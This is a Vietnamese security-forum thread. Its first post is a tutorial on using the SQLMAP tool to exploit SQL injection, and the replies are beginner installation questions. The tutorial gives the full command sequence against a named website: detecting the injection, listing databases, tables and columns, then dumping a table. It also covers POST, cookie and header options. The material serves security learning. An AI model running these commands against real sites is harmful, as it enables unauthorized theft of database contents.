Hướng dẫn sử dụng SQLMAP để khai thác SQL Injection

Thảo luận trong 'Web Security' bắt đầu bởi nonellldd, 08/03/17, 04:03 AM.

  1. nonellldd

    nonellldd Guest

    Có bạn ez101 nói không hiểu rõ bài https://whitehat.vn/forum/thao-luan/...tool-khai-thac
    Mình sẽ giải thích các lệnh sử dụng trong bài viết và giới thiệu thêm một số tùy chọn khác của SQLMAP

    Đầu tiên SQLMAP bạn có thể download tại http://tools.whitehat.vn/download (Cần cài đặt python https://www.python.org/downloads/)
    ok, bắt đầu với lệnh đầu tiên
    Lệnh 1
    Mã:
    python sqlmap.py –u “http://zerocoolhf.altervista.org/level1.php?id=1”  "-u" theo sau là đường dẫn Lệnh này để kiểm tra url trên có dính lỗi sqli không 
    Lệnh 2
    Mã:
     python sqlmap.py –u “http://zerocoolhf.altervista.org/level1.php?id=1” --dbs Khi đã xác định được url trên bị lỗi, sử dụng flag "--dbs" để liệt kê các database 
    Lệnh 3
    Mã:
     python sqlmap.py –u “http://zerocoolhf.altervista.org/level1.php?id=1” --tables –D my_zerocoolhf Như trong bài viết đã liệt kê được 2 database là my_zerocoolhf và infomation_schema -D my_zerocoolhf: báo cho sqlmap.py biết chương trình sẽ làm việc với database my_zerocoolhf --table: dùng để liệt kê các bảng trong database my_zerocoolhf 
    Lệnh 4
    Mã:
     python sqlmap.py –u “http://zerocoolhf.altervista.org/level1.php?id=1” --columns –D my_zerocoolhf –T book Lệnh 3 đã liệt kê ra các bảng của my_zerocoolhf, lệnh 4 dùng để liệt kê ra tên cột có trong bảng book sự khác biệt giữa -T và --table là --table dùng để liệt kê, -T là lựa chọn để chương trình làm việc với bảng book 
    Mã:
     python sqlmap.py –u “http://zerocoolhf.altervista.org/level1.php?id=1” --dump –D my_zerocoolhf –T book --dump: dùng để dump toàn bộ dữ liệu của bảng book 
    Một số tùy chọn khác của sqlmap:
    Mã:
    --data="DATA" : sử dụng cho phương thức POST,  ex: khi login thường hay sử dụng python sqlmap.py -u "url/path" --data "user=mark&passwd=line"
    Mã:
    --cookie="cookie" : sử dụng khi lỗ hổng nằm trong cookie 
    Mã:
    --user-agent=AGENT : có thể ứng dụng kiểm tra trường user-agent trong header nên tùy chọn --user-agent sử dụng trong trường hợp này ex: python sqlmap.py -u "url/path" --data "user=mark&passwd=line" --user-agent "Mozilla/5.0 (Linux; ; ) AppleWebKit/ (KHTML, like Gecko) Chrome/ Mobile Safari/"  
     (user-agent của chrome trên android) 
    Mã:
    --header HEADER | --headers HEADERS khi request cần thêm một số trường thì -H (--headers) được sử dụng 
    Còn rất nhiều các tùy chọn hữu ích thường được sử dụng để khai thác sqli bằng sqlmap, có thểm tham khảo thêm tại https://github.com/sqlmapproject/sqlmap/wiki/Usage hoặc sử dụng python sqlmap.py --help
    Chúc các mem nữ 8.3 vui vẻ
    nonellldd
     
    Chỉnh sửa cuối: 08/03/17, 04:03 AM
    Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
    nonellldd thích bài này.
  2. nguyenmanhson

    nguyenmanhson Whi-----

    Tham gia: 12/03/17, 08:03 AM
    Bài viết: 17
    Đã được thích: 0
    Điểm thành tích:
    1
    Hay quá anh ơi!!!
     
    Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
  3. nguyenmanhson

    nguyenmanhson Whi-----

    Tham gia: 12/03/17, 08:03 AM
    Bài viết: 17
    Đã được thích: 0
    Điểm thành tích:
    1
    Anh ơi , em làm như anh nhưng nó ghi : python: can't open file 'sqlmap.py': [Errno 2] No such file or directory
     
    Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
  4. hoangnghiaac

    hoangnghiaac Wh------

    Tham gia: 06/02/17, 04:02 PM
    Bài viết: 47
    Đã được thích: 0
    Điểm thành tích:
    6
    hình như sqlmap có mấy kiểu nhất định, có mấy cái như admin.php?vs=null thì nó báo lỗi, không biết mấy cái này thì phải làm sao ??
     
    Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
  5. krone

    krone Moderator Thành viên BQT

    Tham gia: 26/07/16, 03:07 PM
    Bài viết: 253
    Đã được thích: 133
    Điểm thành tích:
    43
    Bạn nên hiểu là sqlmap là một tool opensource, và nó được chạy trên Python.
    Mod #nonelldd thực ra là đang dùng source bên ngoài chưa được gán vào Variable Environment.

    trong kali thì có sẵn. hoặc bạn có thể download sqlmap từ source này. http://sqlmap.org/
     
    Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
  6. hoangnghiaac

    hoangnghiaac Wh------

    Tham gia: 06/02/17, 04:02 PM
    Bài viết: 47
    Đã được thích: 0
    Điểm thành tích:
    6
    sao bạn k xài kali luôn cho tiện??
     
    Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
  7. nonellldd

    nonellldd Guest

    Bạn cho mình xin 500 hình ảnh được không :)))
     
    Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
  8. End

    End New Member

    Tham gia: 31/03/19, 02:03 AM
    Bài viết: 2
    Đã được thích: 0
    Điểm thành tích:
    1
    cho em hỏi là cách cài đặt trên MacOS củng giống như Windows phải không ạ?
     
    Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
  9. End

    End New Member

    Tham gia: 31/03/19, 02:03 AM
    Bài viết: 2
    Đã được thích: 0
    Điểm thành tích:
    1
    upload_2019-3-31_20-50-16.png
    cho mình hỏi sao nó báo không công nhận vậy ạ? em xin cảm ơn
     
    Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
  10. NgMSon

    NgMSon Well-Known Member

    Tham gia: 22/03/17, 10:03 AM
    Bài viết: 592
    Đã được thích: 733
    Điểm thành tích:
    93
    bác xem lại python đi
     
    Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan